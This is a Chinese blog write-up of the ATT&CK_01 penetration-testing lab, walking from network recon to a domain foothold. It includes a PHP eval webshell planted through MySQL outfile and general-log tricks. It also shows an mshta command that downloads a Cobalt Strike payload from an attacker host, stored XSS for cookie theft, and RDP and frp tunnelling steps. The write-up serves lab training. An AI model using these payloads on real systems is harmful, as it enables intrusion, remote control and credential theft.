发表更新内网渗透5 分钟读完 (大约682个字)0次访问

ATT&CK_01靶场复现

环境配置

靶场环境部署时,win7虚机需要进入系统手动开启一下phpstudy,且关闭防火墙。

综合渗透

信息收集

查看本机地址段,使用netdiscover发现同段存活主机

1
netdiscover -i eth0 -r 192.168.49.0/24

image-20211027165007738

使用nmap扫描目前主机端口开放情况

1
nmap -T4 -A -v -sS 192.168.49.129

image-20211027165746145

站点目录扫描

1
python3 dirsearch.py -u "http://192.168.49.129/" -e php

image-20211028110507409

image-20211028134039225

漏洞利用

phpmyadmin写日志getshell

web访问发现直接是phpstudy探针,通过探针测试出mysql存在弱口令root/root

因为phpstudy存在phpmyadmin组件,直接利用phpmyadmin实现写webshell操作

1
select '<?php @eval($_POST["cmd"])?>' into outfile 'C:/phpStudy/WWW/shell.php'

但是开启了写文件限制

image-20211027172141356

但是这里可以尝试使用日志文件getshell

首先查看日志状态

1
show variables  like  '%general%';

image-20211027172342830

当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell

1
2
SET GLOBAL general_log='on'
set GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'

再次执行含有shell的语句,请求发现写入成功

image-20211027172655912

后台弱口令getshell

image-20211028140613746

根据备份站点文件获取完整路径信息

1
http://192.168.49.129/yxcms/protected/apps/default/view/default/hack.php

image-20211028141427018

存储型XSS

前台注册用户留言板插入,后台审核通过即可触发。

image-20211028141605979

在实际业务场景下,可以以次获取管理用户cookie,伪造登录

主机上线

cs主机上线提权

使用蚁剑成功连接shell

image-20211028103301810

使用cs html上线主机,且是administrator权限。

1
mshta http://192.168.49.130:80/download/file.ext

image-20211028104449312

使用cs内建提权码,成功提至管理员权限

image-20211028110034370

主机信息收集

shell ipconfig /all获取内网主机网段为192.168.29.0/24 域为 god.org

image-20211028144122563

查看域信息

shell net group /domain

image-20211122153614191

上传3389.bat脚本开启3389端口 使用远程桌面进行连接

上传frp代理实现socks5内网穿透

ATT&CK_01靶场复现

http://www.greetdawn.top/2021/10/27/内网渗透/ATT-CK-01/

作者

丨greetdawn丨

发布于

2021-10-27

更新于

2023-05-05

许可协议

#

喜欢这篇文章?打赏一下作者吧

评论

关注我
×